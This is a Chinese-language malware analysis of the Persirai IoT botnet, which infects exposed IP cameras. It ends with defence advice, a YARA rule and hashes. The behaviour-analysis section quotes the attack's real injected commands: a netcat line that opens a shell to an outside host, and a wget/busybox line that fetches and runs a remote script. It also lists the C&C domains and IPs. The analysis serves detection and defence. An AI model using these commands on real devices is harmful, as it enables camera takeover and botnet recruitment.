趨勢科技(Trend Micro)最近發現了一種新型物聯網(IoT)僵尸網絡,該僵尸網絡利用惡意軟件 ELF_PERSIRAI.A進行不斷傳播感染。據分析,目前已有多家原始設備制造商(OEM)的1000多種型號網絡攝像頭產品受此惡意網絡感染,但趨勢科技并未透露詳細受影響制造商,下一步可能會和相關制造商配合進行感染識別和漏洞修復。這可能是繼Mirai和Hajime之后又一波針對IoT設備的新型攻擊力量,趨勢科技把其命名為Persirai。
趨勢科技通過Shodan發現,大約有120,000臺網絡攝像設備面臨感染Persirai的風險,這些設備赤裸裸地暴露在網,極易被攻擊者通過其設備80端口入侵Web管理頁面,形成感染控制,然而,其設備使用者卻對此毫無意識。以下是4月26日的Persirai感染趨勢圖,從圖中可以看出,中國是該類僵尸網絡感染的重災區,僅大陸地區的感染率就高達20.3%。
行為分析
通常,在用戶內部網絡中,網絡攝像頭通常可以使用路由器的即插即用(UPnP)協議功能進行端口映射,使得用戶可以通過廣域網遠程訪問到設備,而這也帶來了感染IoT惡意軟件的風險。Persirai正是利用惡意軟件ELF_PERSIRAI.A,對暴露在網的網絡攝像頭進行傳播感染:
目前,這種攻擊的大部分受影響設備由于未更改默認出廠密碼或存在弱口令,攻擊者通過密碼組合進行大規模的自動化入侵登錄,進入網絡攝像頭的Web管理接口后,通過以下注入命令強制攝像設備連接到一個下載網站執行惡意文件下載:
$(nc load.gtpnet.ir 1234 -e /bin/sh)
之后,遠端下載網站將會給出以下命令響應,通知被控制的網絡攝像頭從域名連接ntp.gtpnet.ir處下載惡意shell腳本文件:
busybox nohup sh -c “killall encoder ;wget http://ntp.gtpnet.ir/wificam.sh -O /tmp/a.sh ;chmod +x /tmp/a.sh ;/tmp/a.sh” > /dev/null 2>&1 &
其中, wificam.sh腳本將會下載并執行以下惡意樣本文件,并在所有惡意程序完全執行之后,進行自毀刪除。
所有惡意樣本程序將會在被控網絡攝像設備的內存中運行,同時,將會在被控設備系統的/dev/null目錄下生成ftpupdate.sh和ftpupload.sh,以阻止0day漏洞和其它形式對被控設備的攻擊。然而,如果被控設備一旦執行重新啟動操作,也不能消除此類隱患,惡意軟件也將迅速對該設備形成攻擊。
C&C控制
網絡攝像頭一旦被感染控制后,將會與以下C&C服務器執行通信響應:
load.gtpnet.ir
ntp.gtpnet.ir
185.62.189.232
95.85.38.103
接收到C&C服務器的響應信息之后,被控攝像頭將會利用前不久公開的一個0day漏洞利用模塊,自動對其它網絡攝像頭發起攻擊。不論目標網絡攝像設備的密碼有多復雜,攻擊者都能利用該漏洞獲取設備的用戶密碼文件,進而進行命令注入。以下是該漏洞的一個攻擊payload:
當然,被控攝像頭還能從C&C服務器處接收對其它網絡系統的DDoS攻擊指令。值得注意的是,Persirai可以利用SSDP包(簡單服務發現協議包),不需要執行IP地址欺騙,就能發起UDP方式的DDoS攻擊。以下為其DDoS攻擊中使用的特殊“后門”協議:
箭頭所指部分標明了被控設備與C&C服務器的通信方式,其中包含了攻擊命令和攻擊目標的IP地址和端口號。
趨勢科技發現的C&C服務器使用了伊朗的.ir后綴域名,而該后綴域名由伊朗某研究機構嚴格管理,只限伊朗人使用。另外,我們還發現該惡意軟件作者使用的一些有意思的波斯語言符號:
我們曾對用來分析的被感染設備嘗試進行固件更新,但更新過程中,其更新狀態卻提示當前固件已經是最新版本。如下圖所示:
總結
在Mirai轟轟烈烈成為首個感染IoT設備的惡意軟件之后,其代碼的開源性特點也會成為未來IoT類惡意軟件的可用之處。隨著物聯網時代的到來,網絡犯罪份子將會從傳統的NTP和DNS服務中脫離開來,使用IoT設備發起DDoS
攻擊。而對普通IoT設備用戶來說,其對設備采取的脆弱安全性措施將會加劇物聯網安全問題的嚴重性。
默認密碼、出廠密碼、弱口令都將會是攻擊者進行攻擊利用的途徑,然而,以上分析中也表明即使是強壯口令也不能免于攻擊。除此之外,物聯網設備使用者應該采取多種手段來防止攻擊,如禁用路由器中的UPNP功能以免于IoT設備和端口的暴露在線、及時更新固件等。當然,IoT安全也不完全是終端用戶的事,還需要設備制造商供應商在生產環節把好安全生產關,才能共筑未來物聯網安全。
檢測Persirai的YARA規則與HASH
YARA規則:
rule Persirai { meta: description = “Detects Persirai Botnet Malware” author = “Tim Yeh” reference = “Internal Research” date = “2017-04-21” hash1 = “f736948bb4575c10a3175f0078a2b5d36cce1aa4cd635307d03c826e305a7489” hash2 = “e0b5c9f874f260c840766eb23c1f69828545d7820f959c8601c41c024044f02c” hash3 = “35317971e346e5b2a8401b2e66b9e62e371ce9532f816cb313216c3647973c32” hash4 = “ff5db7bdb4de17a77bd4a552f50f0e5488281cedc934fc3707833f90484ef66c” hash5 = “ec2c39f1dfb75e7b33daceaeda4dbadb8efd9015a9b7e41d595bb28d2cd0180f”
strings: $x1 = “ftpupload.sh” fullword ascii $x2 = “/dev/misc/watchdog” fullword ascii $x3 = “/dev/watchdog” ascii $x4 = “:52869/picsdesc.xml” fullword ascii $x5 = “npxXoudifFeEgGaACScs” fullword ascii
$s1 = “ftptest.cgi” fullword ascii $s2 = “set_ftp.cgi” fullword ascii $s3 = “2580e538f3723927f1ea2fdb8d57b99e9cc37ced1” fullword ascii $s4 = “023ea8c671c0abf77241886465200cf81b1a2bf5e” fullword ascii
condition: uint16(0) == 0x457f and filesize ( ( 1 of ($x*) and 1 of ($s*) ) or 2 of ($s*) ) }
Persirai利用的惡意軟件ELF_PERSIRAI.A SHA256相關哈希值:
d00b79a0b47ae38b2d6fbbf994a2075bc70dc88142536f283e8447ed03917e45
f974695ae560c6f035e089271ee33a84bebeb940be510ab5066ee958932e310a
af4aa29d6e3fce9206b0d21b09b7bc40c3a2128bc5eb02ff239ed2f3549532bb
aa443f81cbba72e1692246b5647a9278040400a86afc8e171f54577dc9324f61
4a5ff1def77deb11ddecd10f96e4a1de69291f2f879cd83186c6b3fc20bb009a
44620a09441305f592fb65d606958611f90e85b62b7ef7149e613d794df3a778
a58769740a750a8b265df65a5b143a06972af2e7d82c5040d908e71474cbaf92
7d7aaa8c9a36324a2c5e9b0a3440344502f28b90776baa6b8dac7ac88a83aef0
4a5d00f91a5bb2b6b89ccdabc6c13eab97ede5848275513ded7dfd5803b1074b
264e5a7ce9ca7ce7a495ccb02e8f268290fcb1b3e1b05f87d3214b26b0ea9adc
ff5db7bdb4de17a77bd4a552f50f0e5488281cedc934fc3707833f90484ef66c
ec2c39f1dfb75e7b33daceaeda4dbadb8efd9015a9b7e41d595bb28d2cd0180f
f736948bb4575c10a3175f0078a2b5d36cce1aa4cd635307d03c826e305a7489
e0b5c9f874f260c840766eb23c1f69828545d7820f959c8601c41c024044f02c
35317971e346e5b2a8401b2e66b9e62e371ce9532f816cb313216c3647973c32
| 
